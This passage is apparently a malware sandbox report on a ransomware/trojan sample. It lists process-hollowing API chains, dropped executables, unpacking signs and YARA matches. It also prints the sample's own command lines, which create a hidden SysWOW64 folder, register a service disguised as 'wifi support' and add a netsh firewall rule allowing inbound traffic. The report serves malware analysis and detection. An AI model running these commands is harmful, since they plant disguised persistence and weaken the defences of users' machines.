                      Source: C:\Windows\explorer.exeSection loaded: ondemandconnroutehelper.dll
                      Source: C:\Windows\explorer.exeSection loaded: ondemandconnroutehelper.dll
                      Source: C:\Windows\explorer.exeSection loaded: ondemandconnroutehelper.dll
                      Source: C:\Windows\explorer.exeSection loaded: ondemandconnroutehelper.dll
                      Source: C:\Windows\explorer.exeSection loaded: ondemandconnroutehelper.dll
                      Source: C:\Windows\explorer.exeSection loaded: ondemandconnroutehelper.dll
                      Source: C:\Windows\explorer.exeSection loaded: ondemandconnroutehelper.dll
                      Source: C:\Windows\explorer.exeSection loaded: ondemandconnroutehelper.dll
                      Source: C:\Windows\explorer.exeSection loaded: ondemandconnroutehelper.dll
                      Source: C:\Windows\explorer.exeSection loaded: ondemandconnroutehelper.dll
                      Source: C:\Windows\explorer.exeSection loaded: ondemandconnroutehelper.dll
                      Source: C:\Windows\explorer.exeSection loaded: ondemandconnroutehelper.dll
                      Source: C:\Windows\explorer.exeSection loaded: ondemandconnroutehelper.dll
                      Source: C:\Windows\explorer.exeSection loaded: ondemandconnroutehelper.dll
                      Source: C:\Windows\explorer.exeSection loaded: ondemandconnroutehelper.dll
                      Source: C:\Windows\explorer.exeSection loaded: ondemandconnroutehelper.dll
                      Source: C:\Windows\explorer.exeSection loaded: ondemandconnroutehelper.dll
                      Source: C:\Windows\explorer.exeSection loaded: ondemandconnroutehelper.dll
                      Source: C:\Windows\explorer.exeSection loaded: ondemandconnroutehelper.dll
                      Source: C:\Users\user\AppData\Local\Temp\768F.exe Section loaded: mscorjit.dll
                      Source: V91yW08J6p.exe Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, RELOCS_STRIPPED
                      Source: 00000026.00000000.927572070.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
                      Source: 00000026.00000000.915798638.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
                      Source: 00000026.00000000.924493030.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
                      Source: 00000026.00000000.918689335.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
                      Source: 00000026.00000001.929538052.0000000000400000.00000040.00020000.sdmp, type: MEMORY Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
                      Source: 00000026.00000000.922458766.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
                      Source: C:\Windows\SysWOW64\cmd.exe File created: C:\Windows\SysWOW64\ejdjvovs\
                      Source: C:\Users\user\Desktop\V91yW08J6p.exe Code function: String function: 00404824 appears 44 times
                      Source: C:\Users\user\AppData\Local\Temp\6902.exe Code function: String function: 0040EE2A appears 40 times
                      Source: C:\Users\user\AppData\Local\Temp\6902.exe Code function: String function: 00402544 appears 53 times
                      Source: C:\Users\user\AppData\Local\Temp\76E7.exe Code function: String function: 004048D0 appears 460 times
                      Source: C:\Users\user\Desktop\V91yW08J6p.exe Code function: 0_2_00540110 VirtualAlloc,GetModuleFileNameA,CreateProcessA,VirtualFree,VirtualAlloc,GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,NtWriteVirtualMemory,NtWriteVirtualMemory,WriteProcessMemory,SetThreadContext,ResumeThread,ExitProcess,
                      Source: C:\Users\user\Desktop\V91yW08J6p.exe Code function: 2_2_00401962 Sleep,NtTerminateProcess,
                      Source: C:\Users\user\Desktop\V91yW08J6p.exe Code function: 2_2_0040196D Sleep,NtTerminateProcess,
                      Source: C:\Users\user\Desktop\V91yW08J6p.exe Code function: 2_2_00402000 NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
                      Source: C:\Users\user\Desktop\V91yW08J6p.exe Code function: 2_2_0040250A NtEnumerateKey,NtEnumerateKey,NtClose,
                      Source: C:\Users\user\Desktop\V91yW08J6p.exe Code function: 2_2_00401A0B NtTerminateProcess,
                      Source: C:\Users\user\Desktop\V91yW08J6p.exe Code function: 2_2_0040201A NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
                      Source: C:\Users\user\Desktop\V91yW08J6p.exe Code function: 2_2_0040201E NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
                      Source: C:\Users\user\Desktop\V91yW08J6p.exe Code function: 2_2_0040202D NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
                      Source: C:\Users\user\Desktop\V91yW08J6p.exe Code function: 2_2_00402084 LocalAlloc,NtQuerySystemInformation,
                      Source: C:\Users\user\Desktop\V91yW08J6p.exe Code function: 2_2_00402491 NtOpenKey,
                      Source: C:\Users\user\Desktop\V91yW08J6p.exe Code function: 2_1_00402000 NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
                      Source: C:\Users\user\Desktop\V91yW08J6p.exe Code function: 2_1_0040250A NtEnumerateKey,NtEnumerateKey,NtClose,
                      Source: C:\Users\user\Desktop\V91yW08J6p.exe Code function: 2_1_0040201A NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
                      Source: C:\Users\user\Desktop\V91yW08J6p.exe Code function: 2_1_0040201E NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
                      Source: C:\Users\user\Desktop\V91yW08J6p.exe Code function: 2_1_0040202D NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
                      Source: C:\Users\user\Desktop\V91yW08J6p.exe Code function: 2_1_00402084 LocalAlloc,NtQuerySystemInformation,
                      Source: C:\Users\user\Desktop\V91yW08J6p.exe Code function: 2_1_00402491 NtOpenKey,
                      Source: C:\Users\user\AppData\Roaming\adiicvb Code function: 5_2_00610110 VirtualAlloc,GetModuleFileNameA,CreateProcessA,VirtualFree,VirtualAlloc,GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,NtWriteVirtualMemory,NtWriteVirtualMemory,WriteProcessMemory,SetThreadContext,ResumeThread,ExitProcess,
                      Source: C:\Users\user\AppData\Roaming\adiicvb Code function: 6_2_00401962 Sleep,NtTerminateProcess,
                      Source: C:\Users\user\AppData\Roaming\adiicvb Code function: 6_2_0040196D Sleep,NtTerminateProcess,
                      Source: C:\Users\user\AppData\Roaming\adiicvb Code function: 6_2_00402000 NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
                      Source: C:\Users\user\AppData\Roaming\adiicvb Code function: 6_2_0040250A NtEnumerateKey,NtEnumerateKey,NtClose,
                      Source: C:\Users\user\AppData\Roaming\adiicvb Code function: 6_2_00401A0B NtTerminateProcess,
                      Source: C:\Users\user\AppData\Roaming\adiicvb Code function: 6_2_0040201A NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
                      Source: C:\Users\user\AppData\Roaming\adiicvb Code function: 6_2_0040201E NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
                      Source: C:\Users\user\AppData\Roaming\adiicvb Code function: 6_2_0040202D NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
                      Source: C:\Users\user\AppData\Roaming\adiicvb Code function: 6_2_00402084 LocalAlloc,NtQuerySystemInformation,
                      Source: C:\Users\user\AppData\Roaming\adiicvb Code function: 6_2_00402491 NtOpenKey,
                      Source: C:\Users\user\AppData\Local\Temp\7CCD.exe Code function: 7_2_0040193B Sleep,NtTerminateProcess,
                      Source: C:\Users\user\AppData\Local\Temp\7CCD.exe Code function: 7_2_00401947 Sleep,NtTerminateProcess,
                      Source: C:\Users\user\AppData\Local\Temp\7CCD.exe Code function: 7_2_0040174C NtMapViewOfSection,NtMapViewOfSection,Sleep,NtTerminateProcess,
                      Source: C:\Users\user\AppData\Local\Temp\7CCD.exe Code function: 7_2_00401951 Sleep,NtTerminateProcess,
                      Source: C:\Users\user\AppData\Local\Temp\7CCD.exe Code function: 7_2_00401FF1 NtQuerySystemInformation,NtQuerySystemInformation,
                      Source: C:\Users\user\AppData\Local\Temp\7CCD.exe Code function: 7_2_004016FD NtMapViewOfSection,NtMapViewOfSection,
                      Source: C:\Users\user\AppData\Local\Temp\7CCD.exe Code function: 7_2_0040158E NtMapViewOfSection,NtMapViewOfSection,
                      Source: C:\Users\user\AppData\Local\Temp\7CCD.exe Code function: 7_2_004015A6 NtMapViewOfSection,NtMapViewOfSection,
                      Source: C:\Users\user\AppData\Local\Temp\7CCD.exe Code function: 7_2_004015BC NtMapViewOfSection,NtMapViewOfSection,
                      Source: C:\Users\user\AppData\Local\Temp\6902.exe Code function: 11_2_00408E26: CreateFileW,DeviceIoControl,CloseHandle,
                      Source: V91yW08J6p.exe Static PE information: Resource name: RT_VERSION type: COM executable for DOS
                      Source: E6AF.exe.3.dr Static PE information: Resource name: RT_VERSION type: COM executable for DOS
                      Source: FF1A.exe.3.dr Static PE information: Resource name: RT_VERSION type: COM executable for DOS
                      Source: 2D5.exe.3.dr Static PE information: Resource name: RT_VERSION type: COM executable for DOS
                      Source: 2941.exe.3.dr Static PE information: Resource name: RT_RCDATA type: COM executable for DOS
                      Source: 7CCD.exe.3.dr Static PE information: Resource name: RT_VERSION type: COM executable for DOS
                      Source: 76E7.exe.3.dr Static PE information: Resource name: RT_VERSION type: COM executable for DOS
                      Source: 6902.exe.3.dr Static PE information: Resource name: RT_VERSION type: COM executable for DOS
                      Source: vsiicvb.3.dr Static PE information: Resource name: RT_VERSION type: COM executable for DOS
                      Source: adiicvb.3.dr Static PE information: Resource name: RT_VERSION type: COM executable for DOS
                      Source: qxoxlxqh.exe.11.dr Static PE information: Resource name: RT_VERSION type: COM executable for DOS
                      Source: 1365.exe.3.dr Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                      Source: 1365.exe.3.dr Static PE information: Section: .edata ZLIB complexity 0.999570876842
                      Source: 2941.exe.3.dr Static PE information: Section: .rsrc ZLIB complexity 0.996257752863
                      Source: V91yW08J6p.exe Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                      Source: C:\Windows\SysWOW64\ejdjvovs\qxoxlxqh.exe Evasive API call chain: GetCommandLine,DecisionNodes,ExitProcess
                      Source: C:\Users\user\AppData\Local\Temp\6902.exe Evasive API call chain: GetCommandLine,DecisionNodes,ExitProcess
                      Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Roaming\adiicvb
                      Source: classification engine Classification label: mal100.rans.troj.evad.winEXE@52/19@109/29
                      Source: C:\Users\user\AppData\Local\Temp\6902.exe File read: C:\Users\user\Desktop\desktop.ini
                      Source: C:\Users\user\AppData\Local\Temp\6902.exe Code function: 11_2_00409A6B EntryPoint,SetErrorMode,SetErrorMode,SetErrorMode,SetUnhandledExceptionFilter,GetModuleHandleA,GetModuleFileNameA,GetCommandLineA,lstrlenA,ExitProcess,GetTempPathA,lstrcpyA,lstrcatA,lstrcatA,GetFileAttributesExA,DeleteFileA,GetEnvironmentVariableA,lstrcpyA,lstrlenA,RegOpenKeyExA,RegSetValueExA,RegCloseKey,GetModuleHandleA,GetModuleFileNameA,GetDriveTypeA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,wsprintfA,lstrcatA,lstrcatA,CreateProcessA,DeleteFileA,GetModuleHandleA,GetModuleFileNameA,GetDriveTypeA,GetCommandLineA,lstrlenA,StartServiceCtrlDispatcherA,DeleteFileA,GetLastError,Sleep,DeleteFileA,CreateThread,CreateThread,WSAStartup,CreateThread,Sleep,Sleep,GetTickCount,GetTickCount,GetTickCount,Sleep,
                      Source: C:\Windows\SysWOW64\ejdjvovs\qxoxlxqh.exe Code function: 26_2_00409A6B EntryPoint,SetErrorMode,SetErrorMode,SetErrorMode,SetUnhandledExceptionFilter,GetModuleHandleA,GetModuleFileNameA,GetCommandLineA,lstrlenA,ExitProcess,GetTempPathA,lstrcpyA,lstrcatA,lstrcatA,GetFileAttributesExA,DeleteFileA,GetEnvironmentVariableA,lstrcpyA,lstrlenA,RegOpenKeyExA,RegSetValueExA,RegCloseKey,GetModuleHandleA,GetModuleFileNameA,GetDriveTypeA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,wsprintfA,lstrcatA,lstrcatA,CreateProcessA,DeleteFileA,GetModuleHandleA,GetModuleFileNameA,GetDriveTypeA,GetCommandLineA,lstrlenA,StartServiceCtrlDispatcherA,DeleteFileA,GetLastError,Sleep,DeleteFileA,CreateThread,CreateThread,WSAStartup,CreateThread,Sleep,Sleep,GetTickCount,GetTickCount,GetTickCount,Sleep,
                      Source: V91yW08J6p.exe ReversingLabs: Detection: 46%
                      Source: C:\Users\user\Desktop\V91yW08J6p.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                      Source: unknown Process created: C:\Users\user\Desktop\V91yW08J6p.exe "C:\Users\user\Desktop\V91yW08J6p.exe"
                      Source: C:\Users\user\Desktop\V91yW08J6p.exe Process created: C:\Users\user\Desktop\V91yW08J6p.exe "C:\Users\user\Desktop\V91yW08J6p.exe"
                      Source: unknown Process created: C:\Users\user\AppData\Roaming\adiicvb C:\Users\user\AppData\Roaming\adiicvb
                      Source: C:\Users\user\AppData\Roaming\adiicvb Process created: C:\Users\user\AppData\Roaming\adiicvb C:\Users\user\AppData\Roaming\adiicvb
                      Source: C:\Windows\explorer.exe Process created: C:\Users\user\AppData\Local\Temp\7CCD.exe C:\Users\user\AppData\Local\Temp\7CCD.exe
                      Source: C:\Windows\explorer.exe Process created: C:\Users\user\AppData\Local\Temp\76E7.exe C:\Users\user\AppData\Local\Temp\76E7.exe
                      Source: C:\Windows\explorer.exe Process created: C:\Users\user\AppData\Local\Temp\6902.exe C:\Users\user\AppData\Local\Temp\6902.exe
                      Source: C:\Windows\explorer.exe Process created: C:\Users\user\AppData\Local\Temp\768F.exe C:\Users\user\AppData\Local\Temp\768F.exe
                      Source: C:\Users\user\AppData\Local\Temp\6902.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\ejdjvovs\
                      Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\AppData\Local\Temp\6902.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\user\AppData\Local\Temp\qxoxlxqh.exe" C:\Windows\SysWOW64\ejdjvovs\
                      Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\AppData\Local\Temp\6902.exe Process created: C:\Windows\SysWOW64\sc.exe C:\Windows\System32\sc.exe" create ejdjvovs binPath= "C:\Windows\SysWOW64\ejdjvovs\qxoxlxqh.exe /d\"C:\Users\user\AppData\Local\Temp\6902.exe\"" type= own start= auto DisplayName= "wifi support
                      Source: C:\Windows\SysWOW64\sc.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\AppData\Local\Temp\6902.exe Process created: C:\Windows\SysWOW64\sc.exe C:\Windows\System32\sc.exe" description ejdjvovs "wifi internet conection
                      Source: C:\Windows\SysWOW64\sc.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\AppData\Local\Temp\6902.exe Process created: C:\Windows\SysWOW64\sc.exe "C:\Windows\System32\sc.exe" start ejdjvovs
                      Source: C:\Users\user\AppData\Local\Temp\768F.exe Process created: C:\Users\user\AppData\Local\Temp\768F.exe C:\Users\user\AppData\Local\Temp\768F.exe
                      Source: C:\Windows\SysWOW64\sc.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\AppData\Local\Temp\6902.exe Process created: C:\Windows\SysWOW64\netsh.exe "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
                      Source: unknown Process created: C:\Windows\SysWOW64\ejdjvovs\qxoxlxqh.exe C:\Windows\SysWOW64\ejdjvovs\qxoxlxqh.exe /d"C:\Users\user\AppData\Local\Temp\6902.exe"
                      Source: unknown Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
                      Source: C:\Windows\SysWOW64\netsh.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\SysWOW64\ejdjvovs\qxoxlxqh.exe Process created: C:\Windows\SysWOW64\svchost.exe svchost.exe
                      Source: C:\Users\user\AppData\Local\Temp\768F.exe Process created: C:\Users\user\AppData\Local\Temp\768F.exe C:\Users\user\AppData\Local\Temp\768F.exe
                      Source: unknown Process created: C:\Users\user\AppData\Roaming\vsiicvb C:\Users\user\AppData\Roaming\vsiicvb
                      Source: C:\Windows\explorer.exe Process created: C:\Users\user\AppData\Local\Temp\E6AF.exe C:\Users\user\AppData\Local\Temp\E6AF.exe
                      Source: C:\Windows\explorer.exe Process created: C:\Users\user\AppData\Local\Temp\FF1A.exe C:\Users\user\AppData\Local\Temp\FF1A.exe
                      Source: C:\Windows\explorer.exe Process created: C:\Users\user\AppData\Local\Temp\2D5.exe C:\Users\user\AppData\Local\Temp\2D5.exe
                      Source: C:\Users\user\AppData\Local\Temp\FF1A.exe Process created: C:\Users\user\AppData\Local\Temp\FF1A.exe C:\Users\user\AppData\Local\Temp\FF1A.exe
                      Source: C:\Windows\explorer.exe Process created: C:\Users\user\AppData\Local\Temp\4ED.exe C:\Users\user\AppData\Local\Temp\4ED.exe
                      Source: C:\Users\user\AppData\Local\Temp\4ED.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
                      Source: C:\Windows\explorer.exe Process created: C:\Windows\System32\backgroundTaskHost.exe "C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca
                      Source: C:\Windows\explorer.exe Process created: C:\Users\user\AppData\Local\Temp\1365.exe C:\Users\user\AppData\Local\Temp\1365.exe
                      Source: unknown Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
                      Source: C:\Windows\explorer.exe Process created: C:\Users\user\AppData\Local\Temp\28B3.exe C:\Users\user\AppData\Local\Temp\28B3.exe
                      Source: C:\Windows\explorer.exe Process created: C:\Users\user\AppData\Local\Temp\2941.exe C:\Users\user\AppData\Local\Temp\2941.exe
                      Source: C:\Windows\explorer.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
                      Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Local\Temp\7CCD.tmp
                      Source: C:\Users\user\AppData\Local\Temp\6902.exe Code function: 11_2_00406A60 lstrcatA,CreateFileA,GetDiskFreeSpaceA,GetLastError,CloseHandle,CloseHandle,FindCloseChangeNotification,GetLastError,CloseHandle,DeleteFileA,GetLastError,
                      Source: C:\Users\user\AppData\Local\Temp\768F.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                      Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:816:120:WilError_01
                      Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1472:120:WilError_01
                      Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7124:120:WilError_01
                      Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5900:120:WilError_01
                      Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5440:120:WilError_01
                      Source: 768F.exe.3.dr, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs Cryptographic APIs: 'CreateDecryptor'
                      Source: 768F.exe.3.dr, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs Cryptographic APIs: 'CreateDecryptor'
                      Source: 13.0.768F.exe.2c0000.1.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs Cryptographic APIs: 'CreateDecryptor'
                      Source: 13.0.768F.exe.2c0000.1.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs Cryptographic APIs: 'CreateDecryptor'
                      Source: 13.0.768F.exe.2c0000.3.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs Cryptographic APIs: 'CreateDecryptor'
                      Source: 13.0.768F.exe.2c0000.3.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs Cryptographic APIs: 'CreateDecryptor'
                      Source: 13.2.768F.exe.2c0000.0.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs Cryptographic APIs: 'CreateDecryptor'
                      Source: 13.2.768F.exe.2c0000.0.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs Cryptographic APIs: 'CreateDecryptor'
                      Source: 13.0.768F.exe.2c0000.0.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs Cryptographic APIs: 'CreateDecryptor'
                      Source: 13.0.768F.exe.2c0000.0.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs Cryptographic APIs: 'CreateDecryptor'
                      Source: 23.0.768F.exe.360000.3.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs Cryptographic APIs: 'CreateDecryptor'
                      Source: 23.0.768F.exe.360000.3.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs Cryptographic APIs: 'CreateDecryptor'
                      Source: Window Recorder Window detected: More than 3 window changes detected
                      Source: C:\Users\user\AppData\Local\Temp\7CCD.exe File opened: C:\Windows\SysWOW64\msvcr100.dll
                      Source: V91yW08J6p.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                      Source: Binary string: C:\vop\voyik\vugibecibimin23_hafi\marayu\gahexa.pdb source: 7CCD.exe, 00000007.00000000.788685513.0000000000413000.00000002.00020000.sdmp, 7CCD.exe, 00000007.00000002.807583857.0000000000413000.00000002.00020000.sdmp
                      Source: Binary string: C:\rativilo_s.pdb source: 76E7.exe, 00000008.00000000.801375549.0000000000413000.00000002.00020000.sdmp
                      Source: Binary string: Vt]C:\rero24 besar69\gomelafulogu m.pdb source: V91yW08J6p.exe, 00000000.00000002.674693489.0000000000413000.00000002.00020000.sdmp, V91yW08J6p.exe, 00000000.00000000.666789569.0000000000413000.00000002.00020000.sdmp, V91yW08J6p.exe, 00000002.00000000.672658801.0000000000413000.00000002.00020000.sdmp, adiicvb, 00000005.00000000.766653368.0000000000413000.00000002.00020000.sdmp, adiicvb, 00000005.00000002.776111156.0000000000413000.00000002.00020000.sdmp
                      Source: Binary string: C:\rero24 besar69\gomelafulogu m.pdb source: V91yW08J6p.exe, 00000000.00000002.674693489.0000000000413000.00000002.00020000.sdmp, V91yW08J6p.exe, 00000000.00000000.666789569.0000000000413000.00000002.00020000.sdmp, V91yW08J6p.exe, 00000002.00000000.672658801.0000000000413000.00000002.00020000.sdmp, adiicvb, 00000005.00000000.766653368.0000000000413000.00000002.00020000.sdmp, adiicvb, 00000005.00000002.776111156.0000000000413000.00000002.00020000.sdmp
                      Source: Binary string: C:\cedelecesi-roputewelu21\ropofarax15\ca.pdb source: 6902.exe, 0000000B.00000002.841823438.0000000000675000.00000004.00000020.sdmp, 6902.exe, 0000000B.00000000.808532336.0000000000413000.00000002.00020000.sdmp, 6902.exe, 0000000B.00000002.840524705.0000000000415000.00000002.00020000.sdmp, qxoxlxqh.exe, 0000001A.00000000.840734241.0000000000413000.00000002.00020000.sdmp, qxoxlxqh.exe, 0000001A.00000002.850054459.0000000000415000.00000002.00020000.sdmp
                      Source: Binary string: <wJC:\vop\voyik\vugibecibimin23_hafi\marayu\gahexa.pdb source: 7CCD.exe, 00000007.00000000.788685513.0000000000413000.00000002.00020000.sdmp, 7CCD.exe, 00000007.00000002.807583857.0000000000413000.00000002.00020000.sdmp
                      Source: Binary string: dC:\rativilo_s.pdb source: 76E7.exe, 00000008.00000000.801375549.0000000000413000.00000002.00020000.sdmp

                      Data Obfuscation:

                      Detected unpacking (overwrites its own PE header)
                      Source: C:\Users\user\AppData\Local\Temp\76E7.exe Unpacked PE file: 8.2.76E7.exe.400000.0.unpack
                      Source: C:\Users\user\AppData\Local\Temp\6902.exe Unpacked PE file: 11.2.6902.exe.400000.0.unpack
                      Source: C:\Windows\SysWOW64\ejdjvovs\qxoxlxqh.exe Unpacked PE file: 26.2.qxoxlxqh.exe.400000.0.unpack
                      Detected unpacking (changes PE section rights)
                      Source: C:\Users\user\AppData\Local\Temp\7CCD.exe Unpacked PE file: 7.2.7CCD.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:EW;
                      Source: C:\Users\user\AppData\Local\Temp\76E7.exe Unpacked PE file: 8.2.76E7.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.reloc:R;
                      Source: C:\Users\user\AppData\Local\Temp\6902.exe Unpacked PE file: 11.2.6902.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.reloc:R;
                      Source: C:\Windows\SysWOW64\ejdjvovs\qxoxlxqh.exe Unpacked PE file: 26.2.qxoxlxqh.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.reloc:R;
                      .NET source code contains method to dynamically call methods (often used by packers)
                      Source: 768F.exe.3.dr, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs .Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[] { typeof(IntPtr), typeof(Type) })
                      Source: 13.0.768F.exe.2c0000.1.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs .Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[] { typeof(IntPtr), typeof(Type) })
                      Source: 13.0.768F.exe.2c0000.3.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs .Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[] { typeof(IntPtr), typeof(Type) })
                      Source: 13.2.768F.exe.2c0000.0.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs .Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[] { typeof(IntPtr), typeof(Type) })
                      Source: 13.0.768F.exe.2c0000.0.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs .Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[] { typeof(IntPtr), typeof(Type) })
                      Source: 23.0.768F.exe.360000.3.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs .Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[] { typeof(IntPtr), typeof(Type) })
                      Source: 23.0.768F.exe.360000.1.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs .Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[] { typeof(IntPtr), typeof(Type) })
                      Source: C:\Users\user\Desktop\V91yW08J6p.exe Code function: 0_2_00404869 push ecx; ret
                      Source: C:\Users\user\Desktop\V91yW08J6p.exe Code function: 0_2_00403433 push ecx; ret
                      Source: C:\Users\user\Desktop\V91yW08J6p.exe Code function: 0_2_00412504 push eax; ret
                      Source: C:\Users\user\Desktop\V91yW08J6p.exe Code function: 0_2_00533C66 push esi; ret
                      Source: C:\Users\user\Desktop\V91yW08J6p.exe Code function: 0_2_00533C01 push esi; ret
                      Source: C:\Users\user\Desktop\V91yW08J6p.exe Code function: 0_2_00543634 push es; iretd
                      Source: C:\Users\user\Desktop\V91yW08J6p.exe Code function: 2_2_00401880 push esi; iretd
                      Source: C:\Users\user\Desktop\V91yW08J6p.exe Code function: 2_2_00402E94 push es; iretd
                      Source: C:\Users\user\Desktop\V91yW08J6p.exe Code function: 2_1_00402E94 push es; iretd
